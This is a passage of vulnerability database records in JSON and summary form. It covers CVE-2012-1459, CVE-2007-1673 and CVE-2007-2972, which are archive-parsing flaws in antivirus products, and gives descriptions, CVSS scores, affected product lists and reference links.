         value: "El analizador de archivos TAR en AhnLab V3 Internet Security versión 2011.01.18.00, Avira AntiVir versión 7.11.1.163, Antiy Labs AVL SDK versión 2.0.3.7, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, AVG Anti-Virus versión 10.0.0.1190, Bitdefender versión 7.2, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, ClamAV versión 0.96.4, Command Antivirus versión 5.2.11.5, Comodo Antivirus versión 7424, Emsisoft Anti-Malware versión 5.1.0.1, F-Prot Antivirus versión 4.6.2.117, F-Secure Anti-Virus versión 9.0.16160.0, Fortinet Antivirus versión 4.2.254.0, G Data AntiVirus versión 21, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Jiangmin Antivirus versión 13.0.900, K7 AntiVirus versión 9.77.3565, Kaspersky Anti-Virus versión 7.0.0.125, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, NOD32 Antivirus versión 5795, Norman Antivirus  versión 6.06.12, nProtect antivirus versión 2011-01-17.01, Panda Antivirus versión 10.0.2.7, PC Tools AntiVirus versión 7.0.3.5, Rising Antivirus versión 22.83.00.03, Sophos Anti-Virus versión 4.61.0, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Trend Micro AntiVirus versión 9.120.0.1004, Trend Micro HouseCall versión 9.120.0.1004, VBA32 versión 3.12.14.2 y VirusBuster versión 13.6.151.0, permite a los atacantes remotos omitir la detección de malware por medio de una entrada de archivo TAR con un campo de longitud correspondiente a toda la entrada, además de parte del encabezado de la siguiente entrada. NOTA: esto puede ser más tarde SPLIT en varios CVE si se publica información adicional que muestra que el error se produjo de manera independiente en diferentes implementaciones de analizador de TAR.",
      },
   ],
   id: "CVE-2012-1459",
   lastModified: "2024-11-21T01:37:02.073",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:49.597",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80390",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80393",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80406",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80407",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52623",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80390",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80393",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80406",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80407",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52623",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-05-09 01:19
Modified
2024-11-21 00:28
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
Impacted products
Vendor Product Version
amavis amavis *
avast avast_antivirus *
avast avast_antivirus 4.6.394
avast avast_antivirus 4.7.652
avast avast_antivirus 4.7.700
avast avast_antivirus_home 4.0
avast avast_antivirus_home 4.6
avast avast_antivirus_home 4.6.652
avast avast_antivirus_home 4.6.655
avast avast_antivirus_home 4.6.665
avast avast_antivirus_home 4.6.691
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_professional 4.0
avast avast_antivirus_professional 4.6
avast avast_antivirus_professional 4.6.603
avast avast_antivirus_professional 4.6.652
avast avast_antivirus_professional 4.6.665
avast avast_antivirus_professional 4.6.691
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.869
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1098
avira antivir *
avira antivir 6.35.00.00
avira antivir 7.04.00.23
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal 7
avira antivir_personal 7
panda panda_antivirus 2007
panda panda_antivirus_and_firewall 2007
picozip picozip *
rahul_dhesi zoo *
unzoo unzoo 4.4
winace winace *
barracuda_networks barracuda_spam_firewall *
barracuda_networks barracuda_spam_firewall model_100
barracuda_networks barracuda_spam_firewall model_200
barracuda_networks barracuda_spam_firewall model_300
barracuda_networks barracuda_spam_firewall model_400
barracuda_networks barracuda_spam_firewall model_500
barracuda_networks barracuda_spam_firewall model_600
barracuda_networks barracuda_spam_firewall model_800
barracuda_networks barracuda_spam_firewall model_900



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "64AF6FAE-B025-4F70-9F52-C7C12C6F705D",
                     versionEndIncluding: "2.4.1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC3BF13-2946-411E-93A5-0C3AF0508C60",
                     versionEndIncluding: "4.7.980",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
                     matchCriteriaId: "8683D747-C092-4841-AABF-280D7EB771F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "D393356E-0464-41B6-9D56-2DCFC6900244",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ED7C89E-E28B-4BE9-952D-86A8D089B41D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1519A450-8F71-408A-81B8-AA6F337E7A25",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
                     matchCriteriaId: "48872452-2B26-44C4-A9FF-0D9D23AAC95A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "275D7948-61FB-4415-A9EB-59EEF9757149",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CCC4081-D877-4DE3-9342-59BCE7C41CE2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
                     matchCriteriaId: "B189DFCB-2307-43B4-8102-BA725CEE0711",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
                     matchCriteriaId: "3C733E69-33B3-465B-B146-A68C26373E00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
                     matchCriteriaId: "2EF16A3D-BC29-4426-BDF5-F1C6E85228B0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
                     matchCriteriaId: "33A71A2C-36AC-4F36-9D94-AA824F4DE14C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
                     matchCriteriaId: "E02983BB-F027-4967-A230-933299D2D061",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
                     matchCriteriaId: "62618C12-3EAC-4434-B2A8-D83612F1A05C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
                     matchCriteriaId: "238FB2B1-41CF-46DB-8ED7-7F2B6609C27D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
                     matchCriteriaId: "B949535B-9771-4AC6-BBDB-8BB3A789A1FA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
                     matchCriteriaId: "97FEA351-FFF6-4452-9A2B-A7AAF4D7EE20",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DC6DA89A-BF71-4031-9B51-E5941FDE5E15",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
                     matchCriteriaId: "18837F1C-8ECD-4202-9489-08D63FB28CDB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DB201D49-EB74-4A5D-B641-86C4429E3EC0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "231DDF5E-5026-4844-8374-45F0926F8C4F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
                     matchCriteriaId: "8822D55C-FEE7-41B5-A8D5-8D9F514CF815",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
                     matchCriteriaId: "B89C0CA4-00DE-4CAD-B554-36C46815A919",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "A618B922-80E7-4769-90BA-5FE231DA6B89",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
                     matchCriteriaId: "40F19B83-BAD9-4CDC-95C5-6D352F223AA9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
                     matchCriteriaId: "762B6C23-5ADD-4221-8146-DF9CE95637BB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
                     matchCriteriaId: "2F3B1651-DC3E-43B8-A5A4-8BEF7D668EEC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DF2D8C10-01E4-43D7-93EE-342BA7E9C489",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D0980CA-26A4-468E-82F3-E03953250343",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
                     matchCriteriaId: "AAB7888A-E884-4C73-AF10-698C56E080F3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF5B2325-D8EE-4D1E-8291-740726FC1EF6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB0EF168-1F0D-4772-8922-0A75CAF28661",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
                     matchCriteriaId: "1F7F2957-4422-4891-B573-F68882D7C8E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CAED694-2497-488B-A2AB-0781501678F4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FDD00670-7EC0-4AA4-98EF-C8AE38330284",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C23C179C-B50E-4F47-BFFA-85848131C99D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C813AD8-5D73-41DF-B710-3CEB20FB9EF2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B38A75AF-D8B4-4B54-87E9-6EED562CAAC1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
                     matchCriteriaId: "5DB520B5-36E8-4F4B-99FF-0FF3F708CC8A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                     matchCriteriaId: "BECD1C6B-EC0F-4203-BA12-F8B02472FF4C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD267D52-D580-4460-AFF9-E5BA478A98FA",
                     versionEndIncluding: "7.3.0.5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
                     matchCriteriaId: "64D94528-A54F-439B-8584-57A82CDF7318",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
                     matchCriteriaId: "DB66A5A4-6758-438D-9155-7475A5406DA5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9F9AF4F-E974-4D6F-AF51-0DA7A59E64FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
                     matchCriteriaId: "C4DBEED1-0648-45F3-AFC2-91C872A1B098",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AD36471-D8DC-4B11-B53B-264AB1560063",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "79845C9F-7884-4F77-B492-4A944D3DCCEA",
                     versionEndIncluding: "2.10",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "B93C2E82-03E5-42CE-A589-B82FBCBE7D52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF7B6EE8-25D5-4C89-A0B8-A069D330A9D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0D03D666-D234-4626-82F9-EC5726BE1920",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
                     matchCriteriaId: "D0BEEFB2-C6ED-43D5-B535-623931C38890",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
                     matchCriteriaId: "C2ECF7F8-A29F-4868-9DE5-4227E5DA2285",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A897043-9003-4F27-8C7D-AE6B2BD0389C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
                     matchCriteriaId: "1F05FEF8-6B34-4874-AD6B-A053415BD939",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
                     matchCriteriaId: "D28FAD61-3723-4CCC-B890-C5869E7AC3EB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
                     matchCriteriaId: "7697AAC2-EC8A-496E-9336-29AAE61CD69E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
                     matchCriteriaId: "BAA47F3A-44BA-4011-8A44-1AE54D02E772",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
                     matchCriteriaId: "423620AD-EA6A-4730-B97A-DF67247372BE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
      },
      {
         lang: "es",
         value: "El archivo unzoo.c, tal como se utiliza en varios productos, incluyendo AMaViS versión 2.4.1 y anteriores, permite a los atacantes remotos causar una denegación de servicio (bucle infinito) por medio de un archivo ZOO con una estructura direntry que apunta hacia un archivo anterior.",
      },
   ],
   evaluatorSolution: "http://xforce.iss.net/xforce/xfdb/34080\r\n\r\n\r\nFor Barracuda Spam Firewall:\r\nUpgrade to the latest virus definition version of Barracuda Spam Firewall (virusdef 2.0.6399 for 3.4 and after or virusdef 2.0.6399o for prior to 3.4), available from the automatic update.\r\n\r\nFor Panda Software Antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4/2/2007 or later), available from the automatic update feature.\r\n\r\nFor avast! antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4.7.981 or later), available from the avast! antivirus Web site. See references.\r\n\r\nFor Avira AntiVir:\r\nUpgrade to the latest version of Avira AntiVir (avpack32.dll version 7.3.0.6 or later), available from the automatic update feature.\r\n\r\nFor AMaViS:\r\nRefer to ASA-2007-2 for patch, upgrade, or suggested workaround information. See References.",
   id: "CVE-2007-1673",
   lastModified: "2024-11-21T00:28:54.050",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-05-09T01:19:00.000",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36208",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25315",
      },
      {
         source: "cve@mitre.org",
         url: "http://securityreason.com/securityalert/2680",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.amavis.org/security/asa-2007-2.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Exploit",
         ],
         url: "http://www.securityfocus.com/bid/23823",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36208",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25315",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securityreason.com/securityalert/2680",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.amavis.org/security/asa-2007-2.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Exploit",
         ],
         url: "http://www.securityfocus.com/bid/23823",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-399",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity ?
Summary
The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.
References
cve@mitre.orghttp://forum.antivir-pe.de/thread.php?threadid=22528Patch
cve@mitre.orghttp://marc.info/?l=full-disclosure&m=118040810718045&w=2
cve@mitre.orghttp://osvdb.org/36710
cve@mitre.orghttp://secunia.com/advisories/25417Patch, Vendor Advisory
cve@mitre.orghttp://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txtVendor Advisory
cve@mitre.orghttp://www.securityfocus.com/archive/1/469880/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/bid/24187Patch
cve@mitre.orghttp://www.securitytracker.com/id?1018132
cve@mitre.orghttp://www.vupen.com/english/advisories/2007/1971
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/34556
af854a3a-2127-422b-91ae-364da2661108http://forum.antivir-pe.de/thread.php?threadid=22528Patch
af854a3a-2127-422b-91ae-364da2661108http://marc.info/?l=full-disclosure&m=118040810718045&w=2
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/36710
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/25417Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txtVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/469880/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/24187Patch
af854a3a-2127-422b-91ae-364da2661108http://www.securitytracker.com/id?1018132
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/34556
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
      },
      {
         lang: "es",
         value: "El motor de análisis sintáctico de ficheros del Avira Antivir Antivirus anterior al 7.04.00.24 permite a atacantes remotos provocar una denegación de servicio (caída de la aplicación) a través de un fichero comprimido UPX manipulado, lo que dispara un error de \"división por cero\".",
      },
   ],
   id: "CVE-2007-2972",
   lastModified: "2024-11-21T00:32:05.820",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36710",
      },
